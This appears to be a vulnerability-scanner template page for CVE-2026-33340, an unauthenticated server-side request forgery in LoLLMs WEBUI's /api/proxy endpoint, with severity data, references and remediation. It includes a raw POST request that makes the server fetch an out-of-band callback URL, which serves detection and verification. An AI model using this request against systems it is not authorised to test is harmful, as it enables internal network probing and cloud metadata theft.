Description
LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.
LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.
id: CVE-2026-33340
info:
name: LoLLMs WEBUI - Server-Side Request Forgery
author: theamanrawat
severity: critical
description: |
LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.
impact: |
Attackers can access internal services, scan local networks, or exfiltrate sensitive cloud metadata, potentially leading to data exposure and further compromise.
remediation: |
Update to a patched version once available or apply mitigations to restrict server-side requests.
reference:
- https://github.com/ParisNeo/lollms-webui/security/advisories/GHSA-mcwr-5469-pxj4
- https://nvd.nist.gov/vuln/detail/CVE-2026-33340
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2026-33340
epss-score: 0.21629
epss-percentile: 0.975
cwe-id: CWE-306
metadata:
max-requests: 1
verified: true
tags: cve,cve2026,lollms,ssrf
http:
- raw:
- |
POST /api/proxy HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"url": "http://{{interactsh-url}}"}
matchers:
- type: dsl
dsl:
- 'contains(content_type, "application/json")'
- 'contains(interactsh_protocol, "http")'
- 'contains(body, "{\"content\":\"")'
- 'status_code == 200'
condition: and
# digest: 490a004630440220678bf1c635b6566989f11855d37a9ddac29ffa1c01b4ca5f4f7d252b0429d95902201298c3e6f9b9dfe7ef2049ec0307a372d2089492e49a56c15637fe6b0866c843:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.